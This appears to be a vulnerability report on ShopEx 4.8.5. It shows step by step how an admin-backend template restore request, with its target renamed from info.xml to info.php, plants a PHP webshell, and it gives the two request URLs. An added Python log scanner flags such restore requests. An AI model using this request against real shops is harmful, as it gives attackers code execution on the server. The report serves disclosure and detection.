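### Brief description:
shopex485 (latest): obtaining a webshell from the admin backend
### Details:
shopex485 (latest): obtaining a webshell from the admin backend
Tested version: shopex485
Date: 2014.8.25
### Proof of vulnerability:
In Page Management - Template List - Template File Management, select any page and edit it.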
[![QQ图片1.jpg](https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg)](https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg)
[![addda.jpg](https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg)](https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg)
Save twice, then copy the link for info.bak_2.xml:
```
http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.xml&p[2]=1354864820
```
Change info.xml in the p[1] parameter to info.php:
```
http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.php&p[2]=1354864820
```
[![addddddddddddd.jpg](https://images.seebug.org/upload/201408/25224605c5441b4ab2b718de74e54efc14df1289.jpg)](https://images.seebug.org/upload/201408/25224605c5441b4ab2b718de74e54efc14df1289.jpg)
The shell now sits in the template folder:
[![QQ图片20140825224437.jpg](https://images.seebug.org/upload/201408/252247146c2341846370c5092d670f149081f7ff.jpg)](https://images.seebug.org/upload/201408/252247146c2341846370c5092d670f149081f7ff.jpg)
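
For defenders, the restore request above can be spotted in web access logs. The following is an added example, not part of the original report or ShopEx code: it flags `recoverSource` requests whose `p[1]` target is not the backup's original name or has a non-template extension. The extension allowlist and the log format are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: extensions a template restore may legitimately write.
ALLOWED_EXT = {".xml", ".html", ".htm", ".css", ".js"}
# Backup names on the page look like info.bak_2.xml (original: info.xml).
BAK_RE = re.compile(r"^(?P<stem>[^/\\]+)\.bak_\d+(?P<ext>\.[A-Za-z0-9]+)$")
REQ_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')

def check_restore(url):
    """Return reasons a recoverSource request is suspicious ([] if clean or unrelated)."""
    q = parse_qs(urlsplit(url).query)
    if q.get("ctl") != ["system/tmpimage"] or q.get("act") != ["recoverSource"]:
        return []
    src = q.get("p[0]", [""])[0]   # backup file being restored
    dst = q.get("p[1]", [""])[0]   # file name the backup is written to
    reasons = []
    if "/" in dst or "\\" in dst or ".." in dst:
        reasons.append("path separator in target")
    ext = "." + dst.rsplit(".", 1)[1].lower() if "." in dst else ""
    if ext not in ALLOWED_EXT:
        reasons.append(f"target extension {ext or '(none)'} not allowed")
    m = BAK_RE.match(src)
    if not m:
        reasons.append("source is not a .bak_N backup name")
    elif dst != m["stem"] + m["ext"]:
        reasons.append("target does not match the backup's original name")
    return reasons

def scan(lines):
    """Return (url, reasons) for every suspicious restore request in the log lines."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        reasons = check_restore(m["url"]) if m else []
        if reasons:
            hits.append((m["url"], reasons))
    return hits

BASE = "/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource"
# Constructed access-log lines; the request paths follow the URLs on this page.
SAMPLE = [
    f'10.0.0.5 - - [25/Aug/2014:22:40:01 +0800] "GET {BASE}&p[0]=info.bak_2.xml&p[1]=info.xml&p[2]=1354864820 HTTP/1.1" 200 512',
    f'10.0.0.5 - - [25/Aug/2014:22:41:37 +0800] "GET {BASE}&p[0]=info.bak_2.xml&p[1]=info.php&p[2]=1354864820 HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Aug/2014:22:42:10 +0800] "GET /shopex/index.php HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE):
        print(url, reasons)
```

The same two checks (fixed extension allowlist, target equal to the backup's original name) are what a server-side fix for the restore action would enforce before writing the file.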